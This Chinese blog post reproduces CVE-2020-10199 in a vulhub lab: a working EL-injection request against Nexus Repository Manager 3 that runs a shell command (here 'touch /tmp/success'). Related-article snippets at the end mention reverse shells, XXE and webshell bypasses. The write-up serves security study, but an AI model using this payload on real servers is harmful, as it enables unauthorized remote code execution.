Nexus Repository Manager 3 远程命令执行漏洞 CVE-2020-10199 漏洞复现

最新推荐文章于 2023-06-06 20:39:17 发布
最新推荐文章于 2023-06-06 20:39:17 发布
阅读量223 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 网络安全 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114319074
版权

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)

by ADummy

0x00利用路线

​ 登录抓包—>获取cookie和csrf token—>burpsuite发包—>命令执行

0x01漏洞介绍

​ Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。

0x02漏洞复现

​ 等待一段时间环境才能成功启动,访问http://your-ip:8081即可看到Web页面。

该漏洞需要至少普通用户身份,所以我们需要使用账号密码admin:admin登录后台。

在这里插入图片描述

登录后,复制当前Cookie和CSRF Token,发送如下数据包,即可执行EL表达式:

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: 278d086ce087c25389bba6fecb03d8a9=3f769ae53838e13e44a4ee0a5fe70526; NX-ANTI-CSRF-TOKEN=0.6813274455108288
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]
  }
}

在这里插入图片描述

进入docker 发现 touch /tmp/success被执行
在这里插入图片描述

ADummy_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199复现
ximo的博客
03-25 517
简介 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。 影响版本 Nexus Repository Manager OSS/Pro 3.x <= 3.21.1 环境搭建 docker环境+vulhub。 git clone https://github.com/vulhub/vulhub.git 启动环境后,访问 ip:8081 : 漏洞复现 使用账号密码adm
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1633
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现
ierciyuan的博客
08-01 1076
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现。测试漏洞并反弹shell。
CVE-2020-10199: Nexus Repository Manager代码执行通告
爱国小白帽
04-02 1404
CVE-2020-10199: Nexus Repository Manager代码执行通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月02日, 360CERT监测发现 Sonatype Security Team 官方发布了一则关于 Nexus Repository Manager 3.x 的远程代码执行漏洞通告。在...
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199
ch258563的博客
06-06 1524
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199
CVE-2019-7238:CVE-2019-7238的Poc-Nexus Repository Manager 3远程执行代码
03-02
CVE-2019-7238 Rico腾讯安全云顶实验室和发现的Nexus Repository Manager 3未经身份验证的远程代码执行< 详细分析(英文): 详细分析(非英语): 安全公告:
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven中央仓库下载所需要的构件...
[Timeline Sec] - CVE-2020-29436:Nexus3 XML外部实体注入复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介Repository Manager)服务。0x02 漏洞概述编号:CVE-2020-29436/servic
nexus-repository-composer:Nexus Repository Manager的Composer支持(正在进行中!)
03-09
docker run -d -p 8081:8081 --name nexus-repository-composer nexus-repository-composer 有关如何持久存储卷的更多信息,请查看。 现在可以从浏览器访问该应用程序,为 从Nexus Repository Manager版本3.17开始...
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞复现
ADummy的博客
03-03 318
Nexus Repository Manager 3 远程命令执行漏洞CVE-2019-7238) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将
限制会话id服务端不共享_【干货分享】Web安全漏洞深入分析及其安全编码
weixin_39930276的博客
12-19 360
阅读:13,003超全Web漏洞详解及其对应的安全编码规则,包括:SQL注入、XSS、CSRF、文件上传、路径遍历、越权、XML以及业务安全等,实例告诉你各个漏洞对应的编码规则。给你的代码加把安全锁!一、Web安全基础1.1常见的Web安全漏洞1.2安全编码原则一切输入都是有害的!!!输出也不安全!输入:传参,cookie、session、http header、数据库……输出:异常信息、敏感...
Atlassian Confluence路径穿越与命令执行漏洞 CVE-2019-3396 漏洞复现
ADummy的博客
02-22 300
Atlassian Confluence 路径穿越与命令执行漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包—>修改payload—>命令执行 0x01漏洞介绍 ​ Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。 服务端模版注入(Server-side Template Injection,SSTI),影响组件Wi
pwn漏洞挖掘技术之栈溢出
Sakura给爷pwn全场
05-17 523
说点题外话,推荐一本二进制漏洞挖掘奇书:《0day安全:软件漏洞分析技术》,这本书从技术到进阶讲了与漏洞挖掘有关的知识。如果要在ctf的pwn方向或者是在网络安全方向的二进制漏洞挖掘中有所提升,这本书一定要看。下面回归正题。 栈在内存中是以什么形式存在的?首先要对内存有一定的了解。内存按功能大致可划分为代码区、数据区、堆区、栈区。其中栈区是内存中功能执行的一部分。通常来说,栈的操作有两种,压栈(PUSH)和弹栈(POP),遵循后进先出的原则(Last In First Out,简称LIFO)。要挖掘栈溢出漏
PHP环境 XML外部实体注入漏洞 XXE 漏洞复现
ADummy的博客
02-26 431
PHP环境 XML外部实体注入漏洞(XXE) by ADummy 0x00利用路线 ​ 构造XXE payload—>POST发送—>有回显(也有blind xxe 参考资料) 0x01漏洞介绍 ​ PHP环境 XML外部实体注入漏洞(XXE) 0x02漏洞复现 payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xx
Weblogic 任意文件上传漏洞 CVE-2018-2894 漏洞复现
ADummy的博客
03-01 120
Weblogic 任意文件上传漏洞CVE-2018-2894) by ADummy 0x00利用路线 ​ burpsuite发包—>命令执行 0x01漏洞介绍 ​ Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。 利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。 影响版本 10.3.6.0 12.1.3.0.0 12.2.1.1.0 0x02漏洞复现
web渗透中bypass防护系统
Shanfenglan's blog
01-25 2947
文章目录1. webshell执行命令2. sql注入2.1 安全狗mssqlmysql2.2 云盾mysql2.3 云锁mysqlfastjsonsafeline参考文章 1. webshell执行命令 文件上传后向webshell传参数: 三重url编码 三重base64编码 cookie传参 参数污染 http://test/xx.jsp?a=xxx很多的垃圾字符xxx&cmd=whoami cookie传参对应webshell: x=ls <?php $p=$_COOKI
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 CVE-2015-1427 漏洞复现
ADummy的博客
02-24 826
ElasticSearch 命令执行漏洞CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 ​ jre版本:openjdk:8-jre ​ elasticsearc
Sonatype Nexus Repository Manager 怎么执行docker pull
最新发布
06-08
其中,"<nexus-url>" 是 Sonatype Nexus Repository Manager 的 URL,"<repository-name>" 是您创建的 Docker 代理存储库的名称,"<image-name>" 是要拉取的 Docker 镜像名称,"<tag>" 是要拉取的 Docker 镜像标签。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值